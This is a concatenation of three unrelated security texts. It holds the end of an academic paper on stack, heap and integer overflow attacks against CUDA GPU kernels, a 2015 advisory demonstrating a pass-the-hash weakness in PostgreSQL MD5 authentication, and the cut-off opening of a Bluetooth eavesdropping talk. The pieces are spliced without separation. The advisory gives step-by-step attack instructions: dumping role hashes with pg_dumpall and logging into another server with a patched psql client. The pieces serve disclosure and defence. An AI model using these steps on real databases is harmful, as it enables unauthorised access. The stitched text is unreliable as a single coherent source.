Sect.4. Section 5presents related work, and Sect. 6concludes this paper.
A Study of Overflow Vulnerabilities on GPUs 105
2 Background on CUDA Architecture
CUDA is a popular general purpose computing platform for NVIDIA GPUs.
CUDA is composed of device driver (handles the low-level interactions with the
GPU), the runtime, and the compilation tool-chain. An application written forCUDA consists of host code running on the CPU, and device code typically called
kernels that runs on the GPU. A running kernel consists of a vast amount of GPU
threads . Threads are grouped into blocks , and blocks are grouped into grids.T h e
basic execution unit is warpthat typically contains 32 threads. Each thread has
its own program counters, registers, and local memory. A block is an independent
unit of parallelism, and can execute independently of other thread blocks. Eachthread block has a private per-block shared memory space used for inter-thread
communication and data sharing when implementing parallel algorithms. A grid
is an array of blocks that can execute the same kernel concurrently. An entire
grid is handled by a single GPU.
The GPU kernel execution consists of the following four steps: (i) input data
is transferred from the host memory to GPU memory through the DMA; (ii) a
host program instructs the GPU to launch a kernel; (iii) the output is transferred
from the device memory back to the host memory through the DMA.
CUDA provides different memory spaces. During execution, CUDA threads
may access data from multiple memory spaces. Each thread maintains its own
private local memory that actually resides in global memory. Automatic variablesdeclared inside a kernel are mapped to local memory. The on-chip shared memory
is accessible to all the threads that are in the same block. The shared memory
features low-latency access (similar to L1 cache), and is mainly used for sharingdata among threads belonging to the same block. The global memory (also called
device memory) is accessible to all threads, and can be accessed by both GPU
and CPU. There are two read-only memory spaces accessible by all threads, i.e.constant and texture memory. Texture memory also offers different addressing
models, as well as data filtering, for some specific data formats. The global,
constant, and texture memory spaces are optimized for different memory usages,
and they are persistent across kernel launches by the same application.
3 Empirical Evaluation of GPU Vulnerabilities
In this section, we first introduce the testing environment. Then, we discussspecific vulnerabilities for stack overflow, heap overflow, and others respectively,
with a focus on the heap overflow because of its potential negative impact and
significance in scenarios where multiple users share GPU devices. Due to the
proprietary nature of the CUDA platform, we can only experimentally confirmthe existence of certain vulnerabilities. And further exploration about inherent
reasons and such issues is beyond the scope of this paper, which may require
a deeper understanding of the underlying implementation of CUDA frameworkand hardware device intricacy.
106 B. Di et al.
Fig. 1. A code snippet of stack overflow in device.
3.1 Experiment Setup
The machine conducting the experiment has a Intel Core i5-4590 CPU clocked at
3.30 GHz, and the GPU is NVIDIA GeForce GTX 750Ti (Maxwell architecture)
that has compute capability 5.0. The operating system is Ubuntu 14.04.4 LTS
(64 bit) with CUDA 7.5 installed. nvccis used to compile CUDA code, and
NVIDIA visual profiler is adopted as a performance profiling tool. CUDA-GDB
allows us to debug both the CPU and GPU portions of the application simulta-neously. The source code of all implemented benchmarks is publicly available at
https://github.com/aimlab/cuda-overflow .
3.2 Stack Overflow
In this section, we investigate the stack overflow on GPUs by considering different
memory spaces that store adversary-controlled data, and exploring all possible
interactions among threads that are located in the same block, or in differentblocks of the same kernel, or in distinct kernels.
The main idea is as follows. The adversary formulates malicious input data
that contains the address of a malicious function, and assign it to variable athat
is defined in global scope. Two stack variables band care declared in a way to
make their addresses adjacent. If we use ato assign values to bto intentionally
overflow band consequently corrupt the stack variable cthat stores function
pointers. Then, when one of the function pointers of cis invoked, the execution
flow would be diverted to the adversary-controlled function. Note that thereis a difference of the stack between the GPU and CPU. In fact, the storage
allocation of GPU stack is similar to the heap, so the direction of overflow is
from low address to high address.
A Study of Overflow Vulnerabilities on GPUs 107
We explain how a malicious kernel can manipulate a benign kernel’s stack
with an illustrating example that is shown in Fig. 1. In the GPU code, we define
9 functions containing 1 malicious function (used to simulate malicious behavior)
and 8 normal functions (only one is shown in Fig. 1, and the other 7 functions are
the same as the function normal1 except the naming). The device qualifier
declares a function that is executed on the device and callable from the device
only. The noinline function qualifier can be used as a hint for the compiler
not to inline the function if possible. The array overf[100] is declared globally
to store data from another array input[100] that is controlled by the malicious
kernel. Given the global scope, the storage of overf[100] is allocated in the global
memory space, indicating both the malicious kernel and benign kernel can access.In addition, two arrays named bufand fpare declared one after another on the
stack to ensure that their addresses are consecutively assigned. The fpstores
function pointers that point to the normal functions declared before, and the
data in overf[100] is copied to buf(shown at line 17) to trigger the overflow.
The length variable is used to control how many words should be copied from
overf tobuf(shown at line 17). It is worth noting that the line 12 is only executed
in the malicious kernel to initialize the overf buffer. If we set length to 26 and
initialize overf with the value1 0x590 (address of the malicious function that
can be obtained using printf(“%p”,malicious) or CUDA-GDB [ 5]), the output
at line 18 would be string “ Normal ”. This is because with value 26, we can only
overwrite the first 5 pointers in fp(sizeof(buf) + sizeof(pFdummy) * 5 == 26 ).
However, setting length to 27 would cause the output at line 18 to be “ Attack! ”,
indicating that fp[5]is successfully overwritten by the address of the malicious
function. This example demonstrates that current GPUs have no mechanisms toprevent stack overflow like stack canaries on the CPU counterpart (Fig. 2).
Fig. 2. Illustration of stack overflow.
It is straightforward to extend our experiments to other scenarios. For exam-
ple, by locating the array overf in the shared memory, we can observe that the
attack is feasible only if the malicious thread and benign thread both reside
in the same block. While if overf is in the local memory, other threads haves
108 B. Di et al.
no way to conduct malicious activities. In summary, our evaluation shows that
attacking a GPU kernel based on stack overflow is possible, but the risk levelof such vulnerability depends on specific conditions like explicit communication
between kernels.
3.3 Heap Overflow
In this section, we study a set of heap vulnerabilities in CUDA. We first inves-
tigate the heap isolation on CUDA GPUs. Then, we discuss how to corrupt
locally-allocated heap data when the malicious and benign threads co-locate in
the same block. Finally, we generalize the heap overflow to cases where twokernels are run sequentially or concurrently.
Fig. 3. A code snippet of heap overflow
Heap Isolation. Similar to the description of stack overflow, we also use a
running example to illustrate heap isolation from two aspects. First, we consider
the case of a single kernel. As shown in Fig. 3(from line 15 to 22), suppose we
have two independent threads t1and t2in the same block, and a pointer variable
bufis defined in the shared memory. We can obtain similar results when bufis
defined in the global memory. For clarity, we use buf 1and buf 2to represent the
A Study of Overflow Vulnerabilities on GPUs 109
bufint1and t2.buf 1is allocated by calling malloc as shown at lines 16 and 17.
Our experiments show that t2can always access buf 1(line 21 to 22) unless buf
is defined in the local scope. Second, we consider the case of two kernels (not
shown in the figure). Kernel aallocates memory space for buf, and assigns the
input value to it. If areturns without freeing the memory of buf, another kernel
bcan always read the content in bufifbalso has a variable bufdefined in either
shared memory or global memory (no memory allocation for bufinb). This is
because the GPU assigns the same address to bufforb, which makes it possible
to access the not freed content of bufinb. In summary, for globally-defined heap
pointer, the memory it points to can be freely accessed by threads that are not
the original allocator. It is not the case for locally-defined heap pointers, butit may still be possible if we can successfully guest the addresses of local heap
pointers (we leave this to future work). Most importantly, when a heap pointer is
globally visible and the corresponding memory is not properly managed (freed),
arbitrary memory accesses across kernels would be possible.
Heap Exploitation. In this experiment, we present that because the heap mem-
ory for different threads or kernels is allocated contiguously, overflowing one
thread’s local buffer may lead to the corruption of another thread’s heap data.
We first consider heap memory allocated in local scope. As shown in Fig. 3
(from line 24 to 29), like before, suppose we have two threads t
1and t2in the
same block. For t1,w eu s e malloc and newto allocate memory for buf 1and fp1
respectively (we use these notations to clarify our discussion). fp1just stores
thestart address of the four virtual functions (the addresses is contained in
the VTABLE). buf 1and fp1are declared locally. t2is the same as t1. After
initializing t1and t2, the memory layout of buf 1,fp1,buf 2,a n d fp2looks like
that shown in Fig. 4. Assume t2has malicious intention. The input int1consists
of normal data, and the input int2consists of four addresses of the malicious
function ( 0x138 ), and the remaining contents of input are the address of buf 2
(0x50263f920 ). When length is less than 11 (not 9 due to alignment), both
t1and t2will print the string “ Normal ”. However, when length is set to 11,
the virtual table address in fp1would be modified to the start address of buf 2
where the four addresses of the malicious function are stored. So the output of
t1will be the string “ Attack! ”. When length is set to 21 (this value is relative
tofp1), both t1and t2will invoke the malicious function. Similarly, assuming
t1is the malicious thread, both t1and t2will output “ Normal ” when length is
less than 21. By assigning 21 to length , only t1will print “ Attack! ”. And when
the value of length is 31, both t1and t2will invoke the malicious function.
Based on the analysis above, we can conclude that the memory allocated from
the heap in CUDA is globally accessible from different GPU threads withoutproper access control, and no protection is provided by the runtime system to
prevent buffer overflow of heap-allocated memory. The addresses of heap pointers
are often guessable, which makes it easy for a adversary to conduct attacks.
Because of the closed-source nature of CUDA, further investigation about the
implementation-level details is left as future work. In the following, we extend ouranalysis to the scenario where two kernels are considered when experimenting
buffer overflow.
110 B. Di et al.
Fig. 4. Ah e a po v e r fl o w : t1and t2represent the benign and malicious thread
respectively.
Heap Exploitation Between Kernels. First, we consider the overflow
between sequentially launched kernels. The experiment setup is similar to theprevious section except that the host launches serially two kernels, kernel
1
(launched first) and kernel 2.kernel 1simulates behaviors of an adversary and
initializes the thread t1.kernel 2represents a benign user. t1’s input data con-
sist of four addresses of malicious function, and its remaining contents are the
address of buf 1.kernel 1intentionally overflows buf 1by using a large value of
length 1, and then terminates. kernel 2allocates memory for buf 2and fp2, but
does not assign any value to them. When accessing one element in fp2as a func-
tion call, we will observe the output of string “ Attack! ”. This is because the
GPU assigns the same addresses of pointer variables to the second kernel, and
the contents used in the first kernel are remained in GPU memory unchanged.
Second, we analyze the situation of two concurrently running kernels as shown
in Fig. 5. This is the typical case of sharing GPUs in cloud or cluster environ-
ment, where different users may access the GPU at the same time. kernel 1and
kernel 2must be in different streams. cudaMemcpyAsync is called to receive data
from the host that allocates page-locked memory. The sleep() function is used
to perform a simple synchronization between kernels to make our experiments
more deterministic. t1inkernel 1mimics a malicious user’s behavior. When buf 2
and fp2are initialized (from line 9 to 12) and at the same time t1has finished
the execution of the forloop (at line 20), we will observe the output of string
“Attack! ”f r o m t2if it continues to run after the pause at line 13. Based on
these observations, we can conclude that multiple kernels, regardless of serially
or concurrently running, have the opportunity to intentionally manipulate the
heap memory of each other.
A Study of Overflow Vulnerabilities on GPUs 111
Fig. 5. A code snippet of concurrent kernel execution.
3.4 Other Vulnerabilities
In this section, we discuss the issues of struct and integer overflow that are
demonstrated in one example. In this case, the attacker can exploit the char-
acteristics of integer operations. Because of the two’s complementary represen-
tation of integers, integer operations may produce undesirable results when anarithmetic operation attempts to produce a numeric value that is too large to
be representable with a certain type.
In this experiment (Fig. 6), we define two variables input[10] and length ,
which stores user data and data size respectively. The device code for func-
tions normal and malicious are the same as defined in Fig. 5. In addition, we
define a struct unsafe , which contains an array buf[6] and a function pointer
of type normal .T h e init() (line 6) function is used to initialize the structure
defined above. The ifstatement (line 12) performs array-bounds check to pre-
vent out-of-bound access. Suppose that the address of the malicious function is
0x43800000438 that is assigned to input[10] as input data by a malicious user.
The variable length whose type is unsigned char is set to 0 by the attacker.
The ifbranch would be executed because the value of length (0) is smaller than
6. But, the value of length will be 255 after it is decremented by one, which
causes that the assignment at line 15 overflows the array bufand corrupt the
function pointer in struct unsafe . This experiment shows that struct and integers
can both be exploited in CUDA. In particular, both overflow and underflow of
integer arithmetic operation are possible, which exposes more opportunities forthe adversaries.
Format string and exception handling vulnerabilities have been studied on
CPUs. However, our experiments show that they currently are not exploitable
112 B. Di et al.
Fig. 6. A snippet code of struct and integer vulnerabilities
on the GPU due to the limited support in CUDA. For format string, the format-
ted output is only supported by devices with compute capability 2.x and higher.
The in-kernel printf function behaves in a similar way to the counterpart in
the standard C-library. In essence, the string passed in as format is output toa stream on the host, which makes it impossible to conduct malicious behavior
through printf to expose memory errors on the GPU. For the exception han-
dling in C++, it is only supported for the host code, but not the device code.
Therefore, we can not exploit the security issues of exception handling on CUDA
GPUs currently.
4 Discussions and Countermeasures
This section discusses potential countermeasures that can prevent or restrictthe impact of the described vulnerabilities. Basically, most discussed weaknesses
have limited impact on current GPUs if considered from the security point of
view. For example, stack overflow and in-kernel heap overflow can only corruptthe memory data from within the same kernel. It is difficult to inject executable
code into a running kernel to change its control flow under the GPU program-
ming model. Of course, it may not be the case when more functionalities areintegrated to make developing GPU applications more like the CPU counter-
parts [ 6]. However, exploitable vulnerabilities for concurrent kernels pose real
and practical risks on GPUs, and effective defenses are required for a secureGPU computing environment.
For security issues of the heap, calling the free() function, to a certain extent,
can offer necessary protection for heap overflows. When an attacker wants toexploit vulnerabilities to corrupt the heap memory that belongs to other threads
and has been freed, error message is reported and the application is terminated.
A Study of Overflow Vulnerabilities on GPUs 113
But this is hard to guarantee in environments where multiple kernels are run-
ning concurrently. The bounds check can be used to prevent overflow for boththe stack and heap, but the performance overhead is non-trivial if frequently
invoked at runtime. In addition, integer overflow may be leveraged to bypass the
bounds check. Therefore, a multifaceted solution is desired to provide full protec-tion against these potential attacks. For example, standalone or hybrid dynamic
and static analysis approaches can be designed to detect memory and integer
overflows. Ideally, such protections should be implemented by the underlyingsystem such as the runtime system, compiler, or hardware of GPU platforms, as
many countermeasures against memory errors on CPUs, such as stack canaries,
address sanitizers, and address randomization, have been shown to be effectiveand practical. Unfortunately, similar countermeasures are still missing on GPUs.
CUDA-MEMCHECK [ 7] can identify the source and cause of memory access
errors in GPU code, so it can detect all the heap related overflows in our experi-
ments. But it fails to identify the stack overflows. CUDA-MEMCHECK is effec-
tive as a testing tool, but the runtime overhead makes it impractical to bedeployed in production environments. Most importantly, when multiple mutu-
ally untrusted users share a GPU device, dynamic protection mechanisms are
indispensable. Thus, we argue that research endeavors should be devoted to thedesign of efficient approaches to preventing security issues for GPUs.
A wide range of defensive techniques has been proposed to prevent or detect
buffer overflows on CPUs. Compiler-oriented techniques including canaries,bounds checking, and tagging are especially useful in our context. Given that
CUDA’s backend is based on the LLVM framework and Clang already supports
buffer overflow detection (AddressSanitizer) through compiler options, we believethese existing tools can be leveraged to implement efficient defenses against
GPU-based overflow vulnerabilities.
5 Related Work
Recently, using GPUs in cloud environment has been shown to be beneficial.
The authors of [ 4] present a framework to enable applications executing within
virtual machines to transparently share one or more GPUs. Their approach aims
at energy efficiency and do not consider the security issues as discussed in this
work. For GPU-assisted database systems, the study in [ 8] shows that data in
GPU memory is retrievable by other processes by creating a memory dump of
the device memory. In [ 9], it is demonstrated feasible to recover user-visited web
pages in widely-used browsers such as Chromium and Firefox, because these
web browsers rely on GPUs to render web pages but do not scrub the con-
tent remained on GPU memory, leading to information leakage. The paper [ 10]
highlights possible information leakage of GPUs in virtualized and cloud envi-
ronments. They find that GPU’s global memory is zeroed only when ECC (Error
Correction Codes) is enabled, which poses high risk of private information expo-sure when ECC is disabled or not available on GPUs. In [ 2], the authors present
a detailed analysis of information leakage in CUDA for multiple memory spaces
114 B. Di et al.
including the global memory, shared memory, and register. A real case study
is performed on a GPU-based AES encryption implementation to reveal thevulnerability of leaking private keys.
However, all existing studies on GPU security have less considered vulner-
abilities that are more extensively studied on CPUs. The paper [ 5]p r e s e n t sa
preliminary study of buffer overflow vulnerabilities in CUDA, but the breadth
and depth are limited as compared to our work. For example, we put more
emphasis on heap overflows between concurrently running kernels, which webelieve deserves special attentions in future research of securing shared GPU
access.
6 Conclusion
In this paper, we have investigated the weakness of GPUs under malicious inten-
tions with a focus on the CUDA platform. We believe the experiments conductedin this work are also applicable to other GPU frameworks such as OpenCL to
reveal the potential security vulnerabilities. Particularly, we have confirmed the
existence of stack and heap overflows through a diversified set of experiments,and also uncovered how integer overflow can be used in overwriting a function
pointer in a struct. Other security issues such as format string and exception
handling are also investigated. Although direct exploitation of these potential
vulnerabilities is not feasible on current CUDA platform, care must be taken
when developing applications for future GPU platforms, because GPU program-ming platforms are evolving with a fast pace. We hope this study can not only
disclose real security issues for GPUs but stimulate future research on this topic
especially for scenarios where GPU devices are shared among untrusted users.
Acknowledgment. This research was supported in part by the National Science
Foundation of China under grants 61272190, 61572179 and 61173166.
References
1. Shi, L., Chen, H., Sun, J., Li, K.: vCUDA: GPU-accelerated high-performance
computing in virtual machines. IEEE Trans. Comput. 61(6), 804–816 (2012)
2. Pietro, R.D., Lombardi, F., Villani, A.: CUDA leaks: a detailed hack for CUDA
and a (partial) fix. ACM Trans. Embedded Comput. Syst. 15(1), 15 (2016)
3. Pai, S., Thazhuthaveetil, M.J., Govindarajan, R.: Improving GPGPU concurrency
with elastic kernels. In: Architectural Support for Programming Languages and
Operating Systems, ASPLOS 2013, Houston, TX, USA, 16–20 March 2013, pp.
407–418 (2013)
4. Ravi, V.T., Becchi, M., Agrawal, G., Chakradhar, S.T.: Supporting GPU shar-
ing in cloud environments with a transparent runtime consolidation framework.
In: Proceedings of the 20th ACM International Symposium on High Performance
Distributed Computing, HPDC 2011, San Jose, CA, USA, 8–11 June 2011, pp.217–228 (2011)
A Study of Overflow Vulnerabilities on GPUs 115
5. Miele, A.: Buffer overflow vulnerabilities in CUDA: a preliminary analysis. J. Com-
put. Virol. Hacking Techn. 12(2), 113–120 (2016)
6. Silberstein, M., Ford, B., Keidar, I., Witchel, E.: GPUfs: integrating a file system
with GPUs. In: Proceedings of the Eighteenth International Conference on Archi-
tectural Support for Programming Languages and Operating Systems. ASPLOS
2013, pp. 485–498. ACM (2013)
7. NVIDIA: CUDA-MEMCHECK. https://developer.nvidia.com/cuda-memcheck
8. Breß, S., Kiltz, S., Sch ̈ aler, M.: Forensics on GPU coprocessing in databases -
research challenges, first experiments, and countermeasures. In: Datenbanksysteme
f ̈ur Business, Technologie und Web (BTW), - Workshopband, 15. Fachtagung des
GI-Fachbereichs “Datenbanken und Informationssysteme” (DBIS), 11–15 March2013, Magdeburg, Germany. Proceedings, pp. 115–129 (2013)
9. Lee, S., Kim, Y., Kim, J., Kim, J.: Stealing webpages rendered on your browser by
exploiting GPU vulnerabilities. In: 2014 IEEE Symposium on Security and Privacy,SP 2014, Berkeley, CA, USA, 18–21 May 2014, pp. 19–33 (2014)
10. Maurice, C., Neumann, C., Heen, O., Francillon, A.: Confidentiality issues on a
GPU in a virtualized environment. In: Christin, N., Safavi-Naini, R. (eds.) FC2014. LNCS, vol. 8437, pp. 119–135. Springer, Heidelberg (2014). doi: 10.1007/
978-3-662-45472-5
9PostgreSQL Pass­The­Hash protocol design weakness 
 
Date: Monday, 2nd March 2015 
Version tested: PostgreSQL v9.5, older ones are affected as well 
Credits: 
 
●Jens Steube: jens.steube __AT__ gmail.com 
●Philipp Schmidt: philipp.smd __AT__ gmail.com 
 
ThePostgreSQLChallenge­ResponseAuthenticationusingtheAUTH_REQ_MD5methodor              
simplyconfiguring"md5"astheHostBasedAuthentication(HBA)inpg_hba.confisthe                 
defaultsettingonmanylinuxdistributionsaswellasrecommendedinthedefault                
configuration on github: 
 
METHOD can be "trust", "reject", "md5", "password", "gss", "sspi", "ident", "peer", "pam", "ldap", "radius" or "cert". 
Note that "password" sends passwords in clear text; "md5" is preferred since it sends encrypted passwords. 
 
Ithasasevereprotocoldesignweakness.Theweaknesswehavefoundhere,andthatwe                   
candemonstratewithaproofofconcept(POC)code,isalsoknownasapass­the­hash                  
(PTH) vulnerability [1]. 
 
ThebasicideaandproblemofPTHisthatanattackercanauthenticatetoaservice(inthis                    
casetothePostgreSQLdatabaseserver)withoutknowingtheactualpassword.Theonly                 
informationheneedstoknowisavalidcombinationofusernameandthehashedpassword                   
whichisstoredinthedatabase.Thishashcouldbedirectlydumpedfromthedisk,froma                   
databasebackuporcouldoriginatefromaverydifferentdatabaseincasethecredentials                 
(username and password) were reused. 
 
PTHismostprominentlyknownfrommimikatz[2]whereitisusedtoauthenticatetowindows                   
services(forinstancethentlmandoldersambaprotocols).Ingeneral,theinformationsecurity                 
industryclassifiesaPTHvulnerabilityasaverycriticalandsevereproblemsincetheattacker                 
doesnotneedtoinvestmanyresources(money,hardware,timeetc)toguesstheplaintextof                   
thehashtocomeupwiththeactualpassword[3].Instead,theservicelogincanbesimply                   
accomplishedbygettingandsendingthehashas­is,withoutanyneedtohaveknowledgeof                 
the users credentials. 
 
ThefactthatthePostgreSQLprotocolisabletouseanencryptedcommunicationusingSSL                   
does not affect the ability to exploit the PTH weakness. 
 
Technical description of the weakness in PostgreSQL  
 
PostgreSQL server store user passwords in the following salted and hashed format: 
 
MD5 ($pass . $username) 
 
where$usernamedenotesthePostgreSQLaccount(role)and$passistheactualplaintext                
password.Fromnowonwewilluse$saltand$usernameindistinguishable;theconcatenation                 
of $pass and $username will be denoted by P (except if the contrary is explicitly stated). 
 
ThecurrentPostgreSQLChallenge­ResponseAuthenticationprotocolusing             
AUTH_REQ_MD5 works like this: 
 
1.Server generates R = 4 random bytes 
2.Server sends R to the client 
3.Client computes F_c = H(H(P) . R) 
4.Client sends F_c to the server  
5.Server has H(P) stored in the database 
6.Server computes F_s = H(H(P) . R) and compares F_s with F_c 
 
Notes: 
 
●The hashing algorithm H is always MD5 for the AUTH_REQ_MD5 method 
●F_candF_sshouldbeidenticalbutweredistinguishedherewithasuffixtoemphasize                  
thatF_cisalwayscomputedonclientside,whileF_sisnewlyandindependently                 
computed on server side 
 
Byanalyzingstepnumber3,onecaneasilyidentifythemainweaknessofthisprotocol,i.e.                   
theH(P)valueishashedagain(byconcatenatingthechallenge)butduringthewhole                 
communication(step1to6)anattackerdoesnotneedtoproofthathehastheactualPvalue                    
(password).AnattackerjustneedstohaveH(P)whichdoesnotdirectlyproofthatheknows                   
thepassword(forthereasonsmentionedbefore).Furthermore,H(P)isdirectlystoredinthe                  
serverdatabase,thisdoesweakentheprotocolevenmore,sincetheclient/attackercould                
have obtained H(P) from there. 
 
Therefore,wewouldsaythatthisproblemcouldbeseenasaprotocoldesignflawandto                  
proofthis,wewillattachapatch/difftothisdocumentsuchthatitiseasiertounderstandthe                      
actual"shortcut"theattackercouldusetocircumventthesecureauthentication(whichshould                 
always ensure that the actual user credentials were indeed involved on client side). 
 
 
Demonstration 
 
Thefollowingstep­by­stepguidewillhelpyouintestingthePTHvulnerability.For                 
convenience,wedidapplythechanges(apatch)directlytothelibsinPostgreSQL.                 
Alternativeanattackercouldsimplybuildastandaloneutilitythatbehaveslike"psql"or                
"pg_dumpall" etc. 
 
Theattacheddifffileisnotapatchtosolvethisproblem,insteaditisademonstrationofthe                     
weakness. It will only modify the code of the client. 
 
1.FirstdownloadthelatestPostgreSQLgitcode(wedidusegitcommitwithsha1                 
checksums up to ee4ddcb38a0abfdb8f7302bbc332a1cb92888ed1): 
 ​git clone git://git.postgresql.org/git/postgresql.git 
2.Enter the postgresql directory: 
cd postgresql 
3.Apply the patch: 
git apply postgresql_diff_clean.txt 
4.Configure the PostgreSQL project: 
./configure 
5.Run make: 
make && make install 
6.Depending on your distro (and installation path), you may need to set $PATH: 
export PATH=$PATH:/usr/local/pgsql/bin/ 
7.Initialize the database (here we use a temp directory ~/postgres_data/): 
pg_ctl ­D ~/postgres_data/ init 
8.Makesurethatmd5isthedefaultauthenticationmethod(AUTH_REQ_MD5),ifnot               
editthefile~/postgres_data/pg_hba.confanddouble­checkthat"md5"isusedas              
METHOD: 
vim ~/postgres_data/pg_hba.conf  
9.Start the PostgreSQL database server: 
postgres ­D ~/postgres_data 
10.Setthepasswordinpsql(herewedidusetheunpatchedpsqlbinarybutitdoesn't                   
really matter): 
psql template1 
CREATE ROLE postgres WITH PASSWORD 'hashcat'; 
ALTER ROLE postgres WITH LOGIN; 
11.Loginwiththemodifiedpsqlutility(thiswon'trequiretheusertoinputtheactual                
password,weonlyneedthe"hash"intheformat"md5"+the32hexadecimalMD5                 
hash): 
psql ­U postgres 
 
 
Notes: 
 
●WhilewedemonstrateherespecificallywiththepsqlutilitywhichcanexploitthisPTH                 
weakness,weactuallymeanalltheotherPostgreSQLtoolsthatusethisfront­endlibs                
too(andasnotedaboveitisnotlimitedtothis,attackerscoulddevelopstandalone                  
tools) 
●The modified psql utility will ask for a hash instead of a password on the prompt: 
Hash: 
or in case the ­U switch is used: 
Hash for user [username]: 
●We have developed two different patch files: 
○thefirstone​postgresql_diff_clean.txt​ismeanttobecompleteandincludes              
some additional and unrequired front end tweaks 
○Theseconddifffile​postgresql_diff_minimal.txt​wasinsteaddesignedtoinclude            
just the changes that are necessarily required for this demonstration to work 
●Anattackerneedstoinputthehashasdemonstratedbelow,i.e.thefixedstring"md5"                 
followed by 32 hexadecimal characters (the actual MD5 hash) 
 
Toconcludethisproofofconceptdemonstration,hereisanexamplehowanattackerwould                  
extractthehashfromthedatabase.Heisusingadatabaseonhost“et”onwhichhegained                     
access already: 
 
postgres@et:~$​ pg_dumpall ­r 
... 
CREATE ROLE postgres; 
ALTER ROLE postgres WITH SUPERUSER INHERIT CREATEROLE CREATEDB LOGIN REPLICATION 
PASSWORD 'md5a6343a68d964ca596d9752250d54bb8a'; 
 
Now that the attacker knows the hash, here's an example how he can use the information to 
connect to a different remote database on host “sf” using our patched client. The client will 
ask for the hash instead of the password. 
 
postgres@et:~$ ​psql ­h sf 
Hash : ​md5a6343a68d964ca596d9752250d54bb8a 
psql (9.5devel, server 9.3.6) 
SSL connection (protocol: TLSv1.2, cipher: DHE­RSA­AES256­GCM­SHA384, bits: 256, compression: off) 
Type "help" for help. 
postgres=#  
 
Just as a side note the password used for this demo is "hashcat" and user is "postgres": 
 
postgres@et:~$ echo ­n hashcatpostgres | md5sum 
a6343a68d964ca596d9752250d54bb8a ­ 
 
 
Transitioning to a more secure hash (Preparation) 
 
BeforewearegoingtoshowhowtosolvethePTHissueitselflet’sdiscusshowtotransition                   
existinghashtoamoresecureone.Thiscanbeseenasapreparationasitwillcomein                     
handy within the PTH solution. 
 
●HashthecurrentMD5valuewithahashalgorithmHofyourchoiceandreplaceitwith                  
thecurrentMD5value.Thatmeans,justforexample,storebcrypt(MD5(P))insteadof                
justMD5(P).Thisenablestheservertoautomaticallyconvertallexistinghashesasit                
isnotrequiredtoasktheuserforhispassword.ThePostgreSQLdatabaseservercan                   
testthecurrenthashinthedatabaseonstartup,findoutifthehashisstillstoredinthe                    
"old"format(forinstanceifthesignaturestartswith"md5")andthenautomatically                
convert all hashes 
●AlternativelythinkaboutdroppingMD5altogether.Whileitisnotthatbadlybrokenas                
manypeoplesay,thereputationofMD5isdamagedandthereareenoughfreeand                  
much more secure alternatives.  
○The advantage of this is you can use H(P) whenever we stated H(H(P)) 
○The disadvantage of this is that you have to ask the user for a new password 
●Intheprotocoldescriptionbelowweassumethattheserverdatabaseonlystores                
H(H(P))anddoesneitherknowH(P),norisiteasytoderiveH(P)fromH(H(P)).The                 
onlyreasonablewayanattackercouldcomeupwithH(P)istoguessthepasswordP                   
itself and this should be made very hard by using a secure hashing algorithm 
●Consideraboutaddingaspecialfieldforholdingauniquesalt.Currentlyyouareusing                
the username. This has the following effect: 
○Ifauserisgettingrenamed,thehashwillnotmatchanylonger.Thereforethe                  
userisforcedtosupplyanewpassword(orthesameoneagain).Howeveryou                 
can not do these changes without user interaction 
○InabiggernetworkwithseveralPostgreSQLdatabaseinstallationsitislikely                
thatoneandthesamepersonhasaccesstoseveraldatabasesusingthesame                
usernameandpassword.Therefore,byexploitingthePTHissue,it’senoughto                
havethedumpofoneofthedatabasestoaccessalldatabasesbecausethe                 
salt is not unique for each database. 
○To make transition easier you can copy the username into the new salt attribute 
 
 
Proposed solution for the PTH weakness 
 
1.Server generates R = 32 random bytes 
2.Server sends R to the client 
3.Client computes C_c = HMAC(H(H(P)), R) 
4.Client computes T_c = H(P) 
5.Client computes F = T_c ^ C_c 
6.Client sends F to the server 
7.Server has H(H(P)) stored in the database 
8.Server computes C_s = HMAC(H(H(P)), R) 
9.Server computes T_s = F ^ C_s 
10.Server computes H(T_s) and compares it with H(H(P)) 
 
Notes: 
 
●Step1shoulduseacryptographicallysecurepseudo­randomnumbergenerator              
(CSPRNG) 
●C_candC_sshouldbeidenticalbutaredistinguishedherewithasuffixtomakeit                  
clearthatC_cwascomputedonclientsidewhileC_swillbenewlyandindependently                  
computed on server side (the same holds for T_c and T_s) 
●Theweakestpointinthedescribedideaaboveisthatifanattackerhasaccesstothe                   
databaseandalreadyhasthehash,hecancalculateT_saswell.SinceT_sisactually                 
just H(P) that would be easier or faster to compute than H(H(P)).  
○WhydoesanattackerwanttoreduceH(H(P))toH(P)andwhydoesheeven                
bother about getting and guessing H(P)? 
○DependingonthehashingalgorithmH,H(P)couldbemuch,muchfasterto               
crack than H(H(P)) 
○Thereasontheattackerwantstogetthecleartextpasswordissimilartothe                 
reasonsdescribedabove:thepasswordscouldenablehimtoaccessother              
services and the password may contain sensitive information itself 
○Thereforewehighlyrecommendtouseadifferenthashingalgorithm,amuch               
stronger one, instead of MD5, at least for the outer hash 
●UsethebinaryresultofMD5insteadoftheasciihexrepresentation.Thiswillresultin                  
a better attacker versus defender (A:D) ratio 
●YoucanoptionallyreplacetheXORinstep#5and#9witharealcryptographically                  
securecipher.OnepossiblesecurewaycouldbetoencryptT_cwithC_casthekey                 
using AES in step #5 and decrypt F with C_s as key on the server in step #9 
 
 
Conclusion 
 
Within this document we have demonstrated what this pass­the­hash (PTH) weakness in 
PostgreSQL is all about, the technical details that describe the idea behind PTH in general 
and also specifically applied to the PostgreSQL challenge­response authentication, a 
proposed solution and finally also how an attacker can misuse all this in real life. 
To conclude, we want to emphasize again that a PTH weakness should not be 
underestimated/neglected and we have all the faith in the PostgreSQL development 
team/community that this problem will be addressed responsible and as soon as possible. 
 
 
Links 
 
[1] Wikipedia: ​Pass the hash 
[2] Benjamin Delpy: ​Mimikatz 
[3] SANS Institute: ​Pass­the­hash attacks: Tools and Mitigation 
 
 Slide 1 
 
Hidden Risks of Bluetooth – © 2007 Joshua Wright“I Can Hear You Now”
Eavesdropping on Bluetooth Headsets
Joshua Wright
jwright@willhac kforsushi.com
 
 
Welcome to this session titled “I Can Hear You Now: Eavesdropping on Bluetooth 
Headsets”.  My name is Joshua Wright, and I' m the author of this material, as well as a 
fervent wireless security researcher and analys t.  For the past several years, I've been 
studying the growth of Bluetooth technology and use, with a careful eye toward the risks 
that Bluetooth can expose us to.  This presentation will examine the risks associated with Bluetooth technology, 
demonstrating some new attacks against Blue tooth technology.  During this presentation, 
it is my goal to help you understand the risk s associated with Bl uetooth technology and 
wireless headsets.  During this presentation, feel free to ask any questions you may have, though I reserve 
the right to defer questions if it looks like we won't be able to make it through all the 
material in the time allotted.  If you prefer to email me with any questions, please feel 
